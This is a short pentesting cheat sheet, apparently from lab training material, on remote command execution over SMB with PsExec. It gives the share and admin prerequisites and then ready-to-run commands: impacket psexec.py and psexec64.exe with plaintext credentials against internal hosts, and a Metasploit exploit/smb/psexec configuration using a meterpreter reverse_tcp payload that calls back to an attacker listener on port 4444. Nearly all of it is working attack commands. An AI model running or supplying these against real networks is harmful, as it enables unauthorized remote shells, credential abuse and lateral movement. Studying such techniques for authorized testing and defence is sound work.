Attack with first user
Psexec
Prerequisite
- Exposed share like
ADMIN$, C$, or other with READ/WRITE access - Required Group Memberships: Local Administrators
psexec.py
- Performed from a Linux-based host.
psexec.py INLANEFREIGHT.LOCAL\AB920:weasal@172.16.7.3
psexec64.exe
- Performed from a Windows-based host.
psexec64.exe \\MACHINE_IP -u Administrator -p Mypass123 -i cmd.exe
use exploit/smb/psexec
set RHOST 192.168.57.141
set SMBDomain EVIL.LOCAL
set SMBUser superuser
set SMBPass Password1
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <LOCAL>
set LPORT 4444